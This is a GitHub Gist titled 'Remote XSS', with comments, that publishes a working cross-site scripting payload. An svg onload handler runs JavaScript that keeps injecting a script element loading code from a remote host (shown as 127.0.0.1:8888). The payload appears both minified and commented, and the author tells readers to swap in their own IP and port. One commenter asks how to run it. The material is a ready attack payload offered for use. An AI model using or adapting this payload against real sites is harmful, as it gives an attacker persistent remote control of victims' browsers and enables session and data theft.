Skip to content

Instantly share code, notes, and snippets.

@bl4de
Last active August 23, 2018 15:23
Show Gist options
  • Save bl4de/c797df109bec9bbe91b9 to your computer and use it in GitHub Desktop.
Save bl4de/c797df109bec9bbe91b9 to your computer and use it in GitHub Desktop.
Remote XSS
// clean JavaScript payload
// I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression)
(function(){
var d=document,s; // create first <script> element
s=d.createElement('script'); // and append it to body
d.body.appendChild(s);
setInterval(function(){
d.body.removeChild(s); // remove, then create again and get connection
s=d.createElement('script');
d.body.appendChild(s);
s.src="//127.0.0.1:8888";
d.body.appendChild(s);
},0);
}
)()
<svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>
@bl4de
Copy link
Author

bl4de commented Feb 25, 2016

Complete XSS payload:

 <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
 setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
 s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>

You need to change s.src IP (or hostname) and TCP port to something what works for you

// clean JavaScript payload
// I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression)
(function(){
    var d=document,s;             // create first <script> element
    s=d.createElement('script');  // and append it to body
    d.body.appendChild(s);
    setInterval(function(){
        d.body.removeChild(s);    // remove, then create again and get connection
        s=d.createElement('script');
        d.body.appendChild(s);
        s.src="//127.0.0.1:8888";
        d.body.appendChild(s);
       },0);
    }
)()

Element:

<script src="//127.0.0.1:8888"></script>

is created only one in the whole DOM.

Browser works little bit slower, but there's no new script element append in every setInterval() iteration.

@elagrija
Copy link

Hi.. I have one query on IIFE way of running remote-XSS-javascript-part.js...

  1. How can i run this code.. I tried to run the code independently .. got an error of document is undefined...
    Can you help me to run the code ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment